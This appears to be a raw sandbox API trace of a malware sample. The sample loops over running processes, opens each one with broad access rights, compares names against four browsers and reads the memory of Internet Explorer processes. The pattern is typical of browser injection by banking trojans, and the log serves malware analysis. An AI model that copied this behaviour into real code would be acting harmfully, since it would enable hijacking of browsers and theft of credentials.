	[0225.833] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0225.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.834] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0225.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5db4
	[0225.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.836] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0225.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.836] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.837] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0225.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.837] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5db8
	[0225.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.838] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.839] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.839] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.839] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.839] NtQueryInformationProcess (in: ProcessHandle=0x5db8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.840] ReadProcessMemory (in: hProcess=0x5db8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.840] ReadProcessMemory (in: hProcess=0x5db8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0225.840] ReadProcessMemory (in: hProcess=0x5db8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.840] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0225.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0225.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5dbc
	[0225.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.841] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0225.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.841] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0225.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.841] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0225.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.842] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.842] NtQueryInformationProcess (in: ProcessHandle=0x5dbc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0225.842] ReadProcessMemory (in: hProcess=0x5dbc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0225.842] ReadProcessMemory (in: hProcess=0x5dbc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0225.842] ReadProcessMemory (in: hProcess=0x5dbc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0225.842] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0225.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0225.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5dc0
	[0225.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.843] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0225.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.844] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.844] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0225.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.844] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0225.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5dc4
	[0225.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.845] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0225.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.846] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.846] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0225.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.847] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5dc8
	[0225.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.848] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.848] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.848] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.849] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5dcc
	[0225.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.850] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.851] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.851] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.851] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5dd0
	[0225.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.852] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.853] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.853] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0225.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5dd4
	[0225.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.854] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0225.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0225.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.855] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0225.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x5dd8
	[0225.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.857] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.857] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.858] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.858] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0225.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x5ddc
	[0225.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.859] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0225.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0225.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.860] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0225.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0225.860] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0225.860] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0225.861] CloseHandle (hObject=0x4fd0) returned 1
	[0225.861] Sleep (dwMilliseconds=0x64) 
	[0225.967] GetCurrentProcessId () returned 0x110
	[0225.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0225.972] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0225.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0225.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0226.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5de0
	[0226.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.014] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.014] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.014] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.015] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0226.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5de4
	[0226.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.016] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.016] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.017] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.018] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0226.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5de8
	[0226.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.019] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0226.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.020] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.020] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0226.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.021] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0226.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5dec
	[0226.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.022] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0226.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.023] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.023] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0226.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.023] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0226.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5df0
	[0226.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.025] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0226.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.025] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.026] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0226.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.026] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0226.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5df4
	[0226.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.028] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0226.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.028] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.029] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0226.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.030] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0226.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5df8
	[0226.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.032] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0226.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.032] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.033] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0226.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.033] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0226.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5dfc
	[0226.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.034] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0226.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.035] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.035] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0226.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.035] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5e00
	[0226.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.037] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.037] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.038] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.038] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5e04
	[0226.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.039] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.040] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
